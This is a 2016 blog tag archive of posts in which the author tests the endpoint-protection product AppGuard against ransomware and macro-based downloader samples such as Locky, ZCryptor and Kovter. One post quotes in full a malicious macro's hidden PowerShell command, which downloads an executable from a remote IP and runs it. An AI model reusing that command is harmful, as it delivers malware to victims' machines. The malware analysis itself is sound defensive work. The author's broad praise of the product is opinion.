Tag Archives: Blue Ridge Networks

Locky deployment methods just changed – Who cares?

30 July 2016

The Post ‘Locky Dropper Now Comes Embedded in the Loader’, published July 28, 2016 in the ReaQta Security Blog, clearly shows that the cyber criminals continuously develop and improve their products. In the past, Locky downloaded the encryption program from a command & control server. In the latest version the encryption program is embedded in the email attachment as strings. The moment the victim runs the loader, the encryption program is extracted from the strings to the User Space and executed from User Space.

This is no rocket science; simply the application of well-known obfuscation methods to the latest Locky variant.

And, with AppGuard installed on top of the security stack, this new Locky variant represents no real danger.

In my opinion, the next generation endpoint protection solutions available on the market will all deal effectively with this sort of zero-day malware. The example of AppGuard shows: It is simply install and forget.

With this, we will gain valuable time for the right and important things like the implementation of Two Factor Authentication or privileged accounts management, or the design of effective security procedures or user training. Unfortunately, the paradigm shift from prevention to detection prevents us from implementing and doing the right and important things. It’s time for a paradigm change…

Have a good weekend.

AppGuard is an important part of a comprehensive security stack

16 July 2016

In the past weeks I tried hard to get an idea of the capabilities of Blue Ridge Networks AppGuard. To be honest, I would not like to miss AppGuard anymore. AppGuard creates the really good feeling that, under certain conditions, many cyber-attacks are simply rendered ineffective.

AppGuard is a perfect means against all kind of Trojans and downloaders, in particular zero days. Characteristic for this kind of malware is that the malware directly drops a malicious program or downloads a malicious program from the attacker’s server and executes it afterwards. This includes e.g. most of the known Ransomware.

The User Space and MemoryGuard concept just blocks this kind of malware out-of-the-box, provided that the User Space concept is not undermined by a user who is working with high privileges permanently. In fact, if the user works with privileges which allow the Trojan program to store files outside the User Space, the concept will no longer work.

It is strongly recommended to work with the least possible privileges under normal conditions. For the case higher privileges are requested, set up an extra account with the required privileges and supply the credentials of this account if UAC requests higher privileges.

More advanced malware may try to use the Windows auto-elevation feature to acquire higher privileges and to compromise AppGuard. To protect from auto-elevation attacks just set UAC to ‘Always notify me’.

This works even in the case of a gaming computer, where e.g. WOW and TeamSpeak are heavily used. Why shouldn’t it work on a standard system?

In addition, it is strongly recommended to disable macro execution in all kind of office software, e.g. Microsoft Office, OpenOffice or LibreOffice.

Memory Guard protects against all kind of zero-day drive-by downloads, PuP (Potentially unwanted Programs) or file-less malware.

My comprehensive security stack

My comprehensive security stack. Click to enlarge.

 

AppGuard does not protect against any kind of password phishing attacks. Although popular internet browsers block many malicious URLs through URL reputation, e.g. SmartScreen Filtering in Internet Explorer or Firefox, this will not protect in the case of zero-days.

To reduce the likelihood of credential theft, turn on Two-Factor Authentication (TFA) for as many as possible internet services you use. If TFA cannot be enabled, choose a strong password and take care, means:

User awareness is the basic part of the entire security stack!

To put it succinctly: The proposed security stack will dramatically reduce the risk of cyber-attacks. Blue Ridge Networks AppGuard is an important component of this stack, in particular for the protection against all kind of zero-days.

Have a good weekend.

AppGuard successfully protects against PowerShell based zero-day malware

9 July 2016

To get a feel for the impact AppGuard has on daily operations I worked mainly on my test system in the past weeks. My test system is a 6 years old Dell Inspiron 1445 with 4 GB of RAM and a 240 GB SSD.  The latest version of Windows 10 is deployed and all out-of-the-box Windows security options like Windows Defender and SmartScreen are activated.

I work with standard user rights; UAC is set to ‘Always notify me’. Macro protection for the office suite is set to ‘Disable all macros with notification’. AppGuard is installed on top of this security stack to protect from all kind of zero days.

The impact on my daily work is hardly noticeable. Standard malware is blocked either by Defender or by SmartScreen. Even the download of e.g. JavaScript based malware from malwr.com for test purposes is a challenging task.

AppGuard does a really good job in blocking the execution all kind of zero-day malware from user space. But how well works AppGuard in the case of somewhat more advanced malware?

I searched for a new PowerShell based malware on malwr.com and found Invoice_201604469.doc.

A check on VirusTotal showed that only 3 of 56 anti-malware products identified malware:

Antivirus Result Update
Fortinet WM/Poseket.A!tr.dldr 20160706
Qihoo-360 heur.macro.powershell.a 20160706
Symantec W97M.Downloader 20160706

As always, the AutoOpen macro is password protected. But LibreOffice overrides the password protection and reveals a master piece of code:

AutoOpen Macro with Powershell code

AutoOpen Macro with PowerShell Code

I opened the document and followed the instructions to execute the AutoOpen macro.

Invoice_201604469.doc

Invoice_201604469.doc. Click to enlarge.

The effect was enormous. AppGuard’s MemoryGuard blocked the execution of the PowerShell script and prevented the download of the payload 18293.exe:

Blocked Program Message

Blocked Program Message 1

Blocked Program Message

Blocked Program Message 2

Thus the command shell wasn’t able to start the payload and Windows displayed the last error message:

Windows Error Message

Windows Error Message

MemoryGuard is a really charming concept, and out-of-the-box available after installation.

This concludes my tests. The experiments of the past weeks show that User Space and MemoryGuard are useful security features. They complete the Windows built-in security features, and provide additional protection, in particular in the case of zero-day malware.

Have a good weekend.

AppGuard protection concepts II

19 June 2016

Preventing the execution of whatever scripts or executables from User Space is one of the basic security concepts of AppGuard. Unfortunately, the User Space concept does not work in the case of fileless malware. A very prominent representative of this malware type is Poweliks.  Poweliks was first detected in August 2014. It hides its payload in the Windows registry, no file is written during the first infection phase.

In the McAfee Labs Threats Report: November 2015 McAfee researchers described in detail how the fileless Kovter malware infects a victim’s system. Kovter writes JavaScript to the registry. This script calls an encrypted PowerShell Script which is also stored in the registry. Finally, the code is written to the memory of another process and executed within the context of this memory.

During this last write process AppGuard’s MemoryGuard enters the game:

Memory protection is designed to prevent one process (originator) from altering or reading the memory of another process (target). Attackers try to re-allocate memory, place executable code into the newly allocated memory, and then execute this code. This type of attack is known as memory code injection and memory scraping. This attack has been widely used in file-less malware which exists only in memory, and Trojan downloader type of malware.

Sound’s easy. Again, ProcessExplorer is the perfect means to show how MemoryGuard works:

Process Explorer: User Process Tree Unprotected

Process Explorer: User Process Tree Unprotected

Process Explorer: User Process Tree in Protected Mode

Process Explorer: User Process Tree in Protected Mode

In Protected mode icons and process descriptions are no longer displayed. Process Explorer retrieves these details from the process memory, and MemoryGuard blocks read access.

Process Explorer: Regedit Process Details Unprotected

Process Explorer: Process Details Unprotected

Process Explorer: Regedit Process Details Protected

Process Explorer: Process Details Protected

In Protected mode important process details are no longer displayed. Process Explorer reads these details from a process’ memory and displays them in the Properties dialogue. If AppGuard is operated in the default mode Protected, MemoryGuard blocks this reading operations, thus details about the process cannot be retrieved.

MemoryGuard is a really charming concept, and out-of-the-box available after installation.

Have a good weekend.

New developments in the field of ransomware

11 June 2016

During my test of AppGuard some new variants of ransomware showed up in the wild.

ReaQta reported a new and massive worldwide Locky ransomware spam campaign. The new variant downloads the payload in encrypted form from the attacker’s command and control server and decrypts it before execution on the victim’s system. This makes it harder for traditional anti-malware systems to identify the payload as malicious.

Since the decrypted version is executed from User Space AppGuard blocks the execution.

Microsoft reported a new variant called ZCryptor which behaves like a worm:

‘ZCryptor can initially infect targets through traditional phishing schemes, macros or fake installers, but also has the ability to place autorun files on removable storage devices. can initially infect targets through traditional phishing schemes, macros or fake installers, but also has the ability to place autorun files on removable storage devices. This means the ransomware can spread itself to other machines on portable storage devices, rather than relying on more targets to fall victim to phishing, according to Microsoft’s security advisory.’

I had to deactivate all Windows 10 security features on my test system to download the malware sample from malwr.com to the User Space of my account:

Timestamp MD5 File Name File Type Antivirus
May 27, 2016, 6:43 p.m. d1e75b274211a78d9c5d38c8ff2e1778 zcrypt.ex_ PE32 executable (GUI) Intel 80386, for MS Windows 39/57

AppGuard runs out-of-the-box in protection mode Protected with default User Space settings.

Again, AppGuard blocked the execution of z_crypt.exe, thus prevented the malware from becoming persistent and from encrypting my documents:

AppGuard stops ZCryptor

AppGuard stops ZCryptor

Even if one receives ZCryptor on a portable device AppGuard will block the execution due to the default Removable Media rule:

AppGuard Removable Media default rule

AppGuard Removable Media default rule

More about AppGuard next week.

Have a good weekend.

AppGuard protection concepts I

4 June 2016

Sysinternals Process Explorer is one of my favorite tools. And the best tool to gain an insight into the operations of Blue Ridge Networks AppGuard.

Process Explorer process tree

Process Explorer process tree

Process Explorer process tree

Process Explorer process tree details

When Process Explorer starts in Windows 10 (64 bit Version) the process is started as a child process of the user’s Explorer process. This start process extracts the 64 bit version of Process Explorer to the local temporary files directory  C:\users\kjochem\AppData\Local\Temp\procexp64.exe and runs the 64 bit version from this directory.

Modern Windows operating systems protect themselves against unintentional changes by users. They restrict change access of users to few directories, e.g. to directory C:\users\<username> in the so-called User Space and prevent write access to the System Space, e.g. C:\windows\system32, unless the user does not work with administrative privileges permanently.

When a user opens a weaponized Word document the Word application is executed in User Space. Thus the Word macro can write commands for the download of malicious content from the attacker’s command & control server to the User Space only. And downloads must be stored in User Space, and thus executed from User Space.

The script below shows how state-of-the-Art malware works. The commands are created by the AutoOpen macro in Word document 839482-Invoice-April.docm, which is identified as e.g. TrojanDownloader.Agent.BEO by ESET-NOD32, W97M.Downloader by Symantec, or WIN32/Spursint.A!cl by Windows Defender.

C:\WINDOWS\system32\cmd.exe /c PowerShell -ExecutionPolicy bypass -noprofile
-windowstyle hidden (New-Object System.Net.WebClient).DownloadFile
 (1) ('http://201.130.72.171/andac.exe','%APPDATA%\MicrosoftLan.exe');
 (2) Start-Process '%APPDATA%\MicrosoftLan.exe'

In this example the (1) andax.exe is downloaded to the user’s APPDATA directory and started (2) from the APPDATA directory afterwards. Shell Variable APPDATA expands on evaluation to C:\users\kjochem\AppData\Roaming.

The same holds for Drive-by Downloads. In the absence of write access outside the User Space the payload of Drive-by Downloads is stored in and executed from User Space.

AppGuard blocks such attacks by preventing the execution of suspicious programs from User space. Quite simple, but very effective.

After installation the default User Space settings already ensure a high level of protection:

AppGuard default User Space Protecion

AppGuard default User Space Protection

In Locked Down mode AppGuard blocks the execution of programs from User Space. With this, the execution of Process Explorer is blocked because program procexp64.exe is executed from a subdirectory of User Space:

AppGuard Blocks Process Explorer

AppGuard Blocks Process Explorer

Process Explorer Error Message

Process Explorer Error Message

Quite simple, but very effective. More about the protection concept of AppGuard next week …

Have a good weekend.

Next generation endpoint protection for end-users

29 May 2016

Application virtualization is a great means to deal with malware. In particular ransomware cannot create massive damage if the malicious program is executed in an isolated virtual container which prevents any interaction with the computing environment.

Unfortunately, most vendors of next generation endpoint protection solutions are directed on the protection of large private businesses and administrative bodies. End-user protection is falling increasingly by the wayside. Consumers must rely on inherently weak anti-malware solutions.

By now some products are available which overcome of the most severe deficits of anti-malware solutions. They offer protection e.g. against drive-by downloads, zero-day malware or file-less malware, for private businesses, administrative bodies and end-users alike.

The winners and finalists of the 2015 Homeland Security Awards in subcategory Best Anti-Malware Platform are :

  • Blue Ridge Networks (Winner)
  • Cylance (Finalist)
  • Malwarebytes (Finalist)

The products of these companies are available for end-users. During the next weeks and posts I will discuss my experience with this products, with special regards to their ability to block zero-day malware and usability.

Today I will share my first experiences with Blue Ridge Networks ‘AppGuard Zero Day Malware Protection‘.

AppGuard is installed on top of an anti-malware solution, in my case Windows Defender. In the AppGuard users guide one reads:

‘Conventional “detect and respond” approaches available are not enough in today’s cyber world. AppGuard is a breach prevention defense that stops breaches at the earliest stages. AppGuard delivers a multi-layered defense, protecting the endpoint at multiple points, including launch control, run-time application control, and memory protection to prevent one application from reading or writing to the memory of another. AppGuard protects your computer against certain applications with the greatest risk of malware, such as Microsoft and Adobe products. AppGuard stops the cyber attacks that traditional security products often miss, even zero-day and fileless malware. AppGuard prevents suspicious applications from running and stops even allowed applications such as your browser from performing high-risk activities that might result in an infected computer.’

Great zero-day malware is available from Malwr.com. Let’s get to work.

I used the following sample (zero-day malware, delivered by Microsoft Word document in zip file) for my first test:

Timestamp MD5 File Name File Type Antivirus
May 24, 2016,
2:53 p.m.		 60a59b324f63621a1e2577e87db4439f Security Notification3.zip Zip archive data 5/57

Security Notification3.zip is delivered by email. The zip file contains a Word Document which loads a file called harakiri.pfx from the attacker’s command and control server and executes this file afterwards.

At May 24, 2016, 6:46 p.m. only 6 of 57 anti-malware solutions on VirusTotal identified the malware:

Antivirus Result Update
AVware LooksLike.Macro.Malware.b (v) 20160524
Arcabit HEUR.VBA.Trojan.e 20160524
McAfee W97M/Downloader.bdx 20160524
Qihoo-360 virus.office.obfuscated.1 20160524
Rising Trojan.Obfus/VBA@DT!1.A540 20160524
VIPRE LooksLike.Macro.Malware.b (v) 20160524

With this, Security Notification3.zip is a perfect zero-day malware sample.

After running a standard installation, I customized AppGuard slightly only. I set the protection level to “Locked Down”:

Blue Ridge Networks AppGuard Main Menu

Blue Ridge Networks AppGuard Main Menu

I downloaded the sample file to my test environment and opened the file in word. AppGuard made a great job. The AutoOpen macro downloaded Harakiri.exe to the local temp folder and AppGuard blocked the execution:

AppGuard blocked Execution Notification

AppGuard blocked Execution Notification

I checked some more samples and got the same results in any case: AppGuard blocks the execution of the downloaded files.

With this, AppGuard fully meets my expectations about zero-day malware delivered by Word-documents.

By now Security Notification3.zip is detected by 35 of 56 anti-malware solutions on VirusTotal.com, e.g. as Trojan:O97M/Madeba.A!det by Windows Defender or  as W2KM_DRIDEX.YYSVD by TrendMicro.

Have a good weekend.